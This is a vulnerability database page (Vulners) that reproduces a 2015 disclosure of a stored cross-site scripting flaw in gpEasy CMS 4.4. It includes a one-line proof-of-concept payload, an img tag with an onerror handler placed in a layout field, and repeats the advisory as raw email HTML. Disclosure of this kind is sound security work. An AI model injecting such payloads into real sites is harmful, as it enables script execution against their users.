Vulners
Lucene search
gpEasy CMS 4.4 Cross Site Scripting
`# Affected software: gpeasy cms
# Type of vulnerability:stored xss
# URL:gpeasy.com
# Discovered by: provensec
# Website: provensec.com
#version: gpEasy 4.4
# Proof of concept
goto
edit layout and fill filed with xss payload "><img src=d
onerror=confirm(1);> and save it javascript will execute
--20cf303f64d02dcd89051578f782
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><div class=3D"gmail_default" style><span style=3D"font-fam=
ily:'comic sans ms',sans-serif"></span><font face=3D"comic sans ms,=
sans-serif"># Affected software:=A0gpeasy cms</font></div><div class=3D"gm=
ail_default" style><font face=3D"comic sans ms, sans-serif"># Type of vulne=
rability:stored xss</font></div><div class=3D"gmail_default" style><font fa=
ce=3D"comic sans ms, sans-serif"># URL:<a href=3D"http://gpeasy.com">gpeasy=
.com</a></font></div><div class=3D"gmail_default" style><font face=3D"comic=
sans ms, sans-serif"># Discovered by: provensec</font></div><div class=3D"=
gmail_default" style><font face=3D"comic sans ms, sans-serif"># Website: <a=
href=3D"http://provensec.com">provensec.com</a></font></div><div class=3D"=
gmail_default" style><font face=3D"comic sans ms, sans-serif"><br></font></=
div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-se=
rif">#version:=A0</font><span style=3D"color:rgb(136,136,136);font-family:s=
ans-serif;font-size:11px;line-height:18px;background-color:rgb(34,34,34)">g=
pEasy 4.4</span></div><div class=3D"gmail_default" style><font face=3D"comi=
c sans ms, sans-serif"># Proof of concept</font><span style=3D"font-family:=
'comic sans ms',sans-serif"></span></div><div class=3D"gmail_defaul=
t" style><span style=3D"font-family:'comic sans ms',sans-serif"><br=
></span></div><div class=3D"gmail_default" style><font face=3D"comic sans m=
s, sans-serif">goto=A0</font></div><div class=3D"gmail_default" style><font=
face=3D"comic sans ms, sans-serif"><br></font></div><div class=3D"gmail_de=
fault" style><font face=3D"comic sans ms, sans-serif">edit layout and fill =
filed with xss payload=A0"><img src=3Dd onerror=3Dconfirm(1);>=
; and save it javascript will execute=A0</font><br></div><div class=3D"gmai=
l_default" style><font face=3D"comic sans ms, sans-serif"><br></font></div>=
<div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-serif"=
><br></font></div></div>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 May 2015 00:00Current
7.4High risk
Vulners AI Score7.4